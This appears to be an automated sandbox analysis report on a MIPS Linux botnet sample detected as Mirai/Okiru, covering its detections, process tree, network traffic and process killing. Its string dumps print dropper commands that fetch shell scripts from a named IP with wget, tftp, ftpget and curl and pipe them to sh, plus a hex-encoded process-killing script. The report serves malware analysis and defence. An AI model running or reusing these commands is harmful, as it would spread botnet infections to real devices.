Edit tour

Linux Analysis Report
mips.nn.elf

Overview

General Information

Sample name:	mips.nn.elf
Analysis ID:	1575253
MD5:	2145cb16a925a273d569c25257eb701a
SHA1:	821c929b723b9c69683f96b921132e0ff98ac9a1
SHA256:	beeeaa8013f74e611c30f4a99aebe4f5e38f3403a3d8314379428ab0a1ddd244
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Okiru

Sample deletes itself

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575253
Start date and time:	2024-12-15 00:46:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 46s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mips.nn.elf
Detection:	MAL
Classification:	mal76.troj.evad.linELF@0/2@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
VT rate limit hit for: mips.nn.elf

Runtime Messages

Command:	/tmp/mips.nn.elf
PID:	5433
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Gorilla Botnet Cats Came After You!
Standard Error:

Process Tree

system is lnxubuntu20

mips.nn.elf (PID: 5433, Parent: 5357, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.nn.elf

mips.nn.elf New Fork (PID: 5456, Parent: 5433)

mips.nn.elf New Fork (PID: 5459, Parent: 5456)

mips.nn.elf New Fork (PID: 5461, Parent: 5456)

mips.nn.elf New Fork (PID: 5470, Parent: 5456)

udisksd New Fork (PID: 5443, Parent: 802)

dumpe2fs (PID: 5443, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5509, Parent: 802)

dumpe2fs (PID: 5509, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5532, Parent: 802)

dumpe2fs (PID: 5532, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5533, Parent: 802)

dumpe2fs (PID: 5533, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

gnome-session-binary New Fork (PID: 5534, Parent: 1588)

sh (PID: 5534, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

gsd-housekeeping (PID: 5534, Parent: 1588, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping

udisksd New Fork (PID: 5538, Parent: 802)

dumpe2fs (PID: 5538, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mips.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
mips.nn.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: mips.nn.elf PID: 5433	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mips.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mips.nn.elf

ReversingLabs: Detection: 42%

Source: mips.nn.elf	String: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginbusybox94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
Source: mips.nn.elf	String: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh94.156.227.233GET /dlr. HTTP/1.0

Source: global traffic	TCP traffic: 192.168.2.13:44548 -> 94.156.227.234:38242
Source: global traffic	TCP traffic: 192.168.2.13:40304 -> 154.216.19.139:199

Source: /tmp/mips.nn.elf (PID: 5433)

Socket: 0.0.0.0:38242

Source: unknown	TCP traffic detected without corresponding DNS query: 43.191.190.218
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 70.6.24.70
Source: unknown	TCP traffic detected without corresponding DNS query: 150.2.161.109
Source: unknown	TCP traffic detected without corresponding DNS query: 213.134.46.100
Source: unknown	TCP traffic detected without corresponding DNS query: 220.98.46.164
Source: unknown	TCP traffic detected without corresponding DNS query: 40.38.255.26
Source: unknown	TCP traffic detected without corresponding DNS query: 54.234.185.176
Source: unknown	TCP traffic detected without corresponding DNS query: 202.212.151.129
Source: unknown	TCP traffic detected without corresponding DNS query: 149.77.79.191
Source: unknown	TCP traffic detected without corresponding DNS query: 20.56.43.86
Source: unknown	TCP traffic detected without corresponding DNS query: 43.191.190.218
Source: unknown	TCP traffic detected without corresponding DNS query: 113.193.247.58
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 66.85.85.13
Source: unknown	TCP traffic detected without corresponding DNS query: 70.6.24.70
Source: unknown	TCP traffic detected without corresponding DNS query: 137.115.32.84
Source: unknown	TCP traffic detected without corresponding DNS query: 84.47.121.178
Source: unknown	TCP traffic detected without corresponding DNS query: 141.103.169.75
Source: unknown	TCP traffic detected without corresponding DNS query: 116.48.251.124
Source: unknown	TCP traffic detected without corresponding DNS query: 134.190.47.75
Source: unknown	TCP traffic detected without corresponding DNS query: 150.2.161.109
Source: unknown	TCP traffic detected without corresponding DNS query: 202.88.155.174
Source: unknown	TCP traffic detected without corresponding DNS query: 215.235.57.72
Source: unknown	TCP traffic detected without corresponding DNS query: 5.195.59.199
Source: unknown	TCP traffic detected without corresponding DNS query: 106.98.196.224
Source: unknown	TCP traffic detected without corresponding DNS query: 83.113.203.187
Source: unknown	TCP traffic detected without corresponding DNS query: 200.202.226.236
Source: unknown	TCP traffic detected without corresponding DNS query: 188.159.120.89
Source: unknown	TCP traffic detected without corresponding DNS query: 213.134.46.100
Source: unknown	TCP traffic detected without corresponding DNS query: 41.220.81.134
Source: unknown	TCP traffic detected without corresponding DNS query: 163.143.162.106
Source: unknown	TCP traffic detected without corresponding DNS query: 162.212.150.201
Source: unknown	TCP traffic detected without corresponding DNS query: 220.98.46.164
Source: unknown	TCP traffic detected without corresponding DNS query: 129.115.113.57
Source: unknown	TCP traffic detected without corresponding DNS query: 106.155.151.56
Source: unknown	TCP traffic detected without corresponding DNS query: 181.190.62.70
Source: unknown	TCP traffic detected without corresponding DNS query: 40.38.255.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.181.7.34
Source: unknown	TCP traffic detected without corresponding DNS query: 54.234.185.176
Source: unknown	TCP traffic detected without corresponding DNS query: 161.183.124.108
Source: unknown	TCP traffic detected without corresponding DNS query: 222.90.52.105
Source: unknown	TCP traffic detected without corresponding DNS query: 68.232.115.198
Source: unknown	TCP traffic detected without corresponding DNS query: 173.130.0.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.198.43.25
Source: unknown	TCP traffic detected without corresponding DNS query: 56.13.103.60
Source: unknown	TCP traffic detected without corresponding DNS query: 97.153.125.245
Source: unknown	TCP traffic detected without corresponding DNS query: 156.226.204.106

Source: mips.nn.elf	String found in binary or memory: http://94.156.227.233/
Source: mips.nn.elf	String found in binary or memory: http://94.156.227.233/curl.sh
Source: mips.nn.elf	String found in binary or memory: http://94.156.227.233/lol.sh
Source: mips.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktc
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh94.156.227.233GET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 792, result: successful
Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 1944, result: successful
Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 3181, result: successful
Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 3185, result: successful
Source: /tmp/mips.nn.elf (PID: 5470)	SIGKILL sent: pid: 5534, result: successful

Source: classification engine

Classification label: mal76.troj.evad.linELF@0/2@0/0

Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5585/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5586/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5587/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5533/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5599/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5534/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5538/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5591/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5592/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5593/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5594/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5276/cmdline
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5595/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5596/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5597/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5532/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5598/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5590/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/1588/cmdline
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5588/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5589/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5600/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/802/cmdline
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5601/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5602/status
Source: /tmp/mips.nn.elf (PID: 5461)	File opened: /proc/5603/status

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/mips.nn.elf (PID: 5433)

File: /tmp/mips.nn.elf

Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5433)

Queries kernel information via 'uname':

Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/grub-editenv1/usr/bin/vmware-namespace-cmd`!/usr/bin/bzfgrep1/usr/bin/networkd-dispatcher
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/dev/vmci0 /dev/zfs1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/mdoc-validate1/usr/bin/xfce4-taskmanager`!/usr/bin/uncompress1/usr/bin/purple-url-handler0!/usr/bin/sg_ident!/usr/bin/qemu-mips641/usr/bin/instmodshps/s10!/usr/bin/thunar-volman!/usr/bin/enchant-2108!
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U1/usr/bin/vmware-vgauth-cmd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/usr/bin/qemu-mipsel
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-microblazeel
Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.zlEnOZ\$
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc32plus
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-riscv32
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips64el
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/speaker-test1/usr/bin/vmware-toolbox-cmd`!/usr/bin/ntfsusermap1/usr/bin/ubuntu-bugs/s10!/usr/bin/lsmem0!/usr/bin/sg_opcodes!/usr/bin/notify-send/us1p
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-alpha
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/qemu-nios2!/usr/bin/dpkg-deb
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-s390x
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4eb
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/expand0!/usr/bin/ttfread1/usr/bin/sha384sumps/s10!/usr/bin/curl0!/usr/bin/slogin1/usr/bin/catU/mips/s10!/usr/bin/captoinfo!/usr/bin/mconfig1/usr/bin/telnet.netkits10!/usr/bin/vmware-rpctool!/usr/bin/eps2eps1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/racc2y2.7!/var/run/mono-xsp4.pid1/usr/bin/resizeparts/a10!/usr/bin/slxdecode!/var/run/mono-xsp41/usr/bin/pydoc3/mips/a10!/usr/bin/debconf-escape!/var/run/crond.reboot1/usr/bin/users-admin/a10!/usr/bin/gdb-add-index!/var/run/sshd1/usr/bin/ssh-import-id-lp0!/usr/bin/qemu-armeb!/var/run/crond.pid1/usr/bin/csharp/mips/10!/usr/bin/podselect!/var/run/udisks21/usr/bin/x86_64-linux-gnu-elfedit&W
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/qemu-mipsn32el!/usr/bin/xzcmp K
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-hgfsclient
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/dbus-monitor1/usr/bin/gimp-test-clipboard-2.01/usr/bin/grotty/mips/s10!/usr/bin/parecord!/usr/bin/sg_rdac1/usr/bin/phar.pharps/s10!/usr/bin/pinky0!/usr/bin/ciptool1/usr/bin/lofficemips/10!/usr/bin/pygettext3!/usr/bin/qemu-tilegx1/usr/bin/gnome-shell-extension-tool
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/usr/bin/qemu-cris
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/qemu-mipsn32!/usr/bin/btattach1@
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/usr/bin/qemu-mipsel
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-nios2
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/usr/bin/vmwarectrl
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-microblaze
Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: MPDIR%s/qemu-op
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/usr/bin/qemu-microblazeel
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-cris
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-mipselUQ`
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsn32
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/systemd1/usr/bin/mono-find-requires`!/usr/bin/rendercheck1/usr/bin/qemu-sparc32plus
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64le
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/atq01/usr/bin/sg_sat_identify1/usr/bin/vmware-checkvm10!/usr/bin/uxterm0!/usr/bin/chacl1/usr/bin/x86_64-linux-gnu-size
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-toolbox-cmd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-hppa
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/oclock0!/usr/bin/ssh-argv01/usr/bin/systemd-id128s10!/usr/bin/pic0!/usr/bin/lspci1/usr/bin/mate-calc-cmds10!/usr/bin/strip0!/usr/bin/unpack2001/usr/bin/systemctlps/10!/usr/bin/rview0!/usr/bin/qemu-riscv641/usr/bin/keep-one-running
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/dev/vmci
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/qemu-hppa!/usr/bin/ptar1/usr/bin/linkiccmips/s10!/usr/bin/xmodmap!/usr/bin/usb_printerid1/usr/bin/gnome-session-custom-session!/usr/bin/pdftocairo!/usr/bin/php1/usr/bin/foo2oak-wrapper0!/usr/bin/locale-check1/usr/bin/automat-visualize31/usr/bin/sg_ses_microcodebin/[0!/usr/bin/sg_bg_ctl!/usr/bin/domainname1/usr/bin/avahi-browse-domains
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /var/run/vmware
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-xferlogs
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/ubuntu-drivers!/usr/bin/pdftohtml1/usr/bin/setsid/mips/s10!/usr/bin/ikdasm0!/usr/bin/trust1/usr/bin/vmware-hgfsclient0!/usr/bin/tzselect!/usr/bin/paste1/usr/bin/chcon/mips/s10!/usr/bin/rcp0!/usr/bin/ldd1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/bsd-from!/usr/bin/resgen21/usr/bin/spice-vdagents10!/usr/bin/twist30!/usr/bin/qemu-sparc641`-"
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/proc/2935/exe1/tmp/vmware-root_727-42906909660!/usr/bin/xfce4-panel!/proc/2936/exe1/usr/lib/bluetooth/obexd0!/proc/3147/exe0!/proc/2961/exe1/proc/3342/exe/mips/r10!/usr/bin/xfsettingsd!/proc/2964/exe1/tmp/.X11-unix/mips/r10!/proc/3146/exe01/usr/bin/gnome-keyring-daemon1/usr/lib/bluetoothps/s10!/usr/bin/xfwm40!/proc/2970/exe1/var/run/dmeventd-client0!/proc/3134/exe0!/proc/2972/exe1/usr/lib/x86_64-linux-gnu/xfce4/panel!/usr/bin/gpg-agent!/proc/2974/exe1/usr/libexec/geoclue-2.0/demos/agent
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/sqlsharp1/usr/bin/vmware-xferlogs`!/usr/bin/caspol1
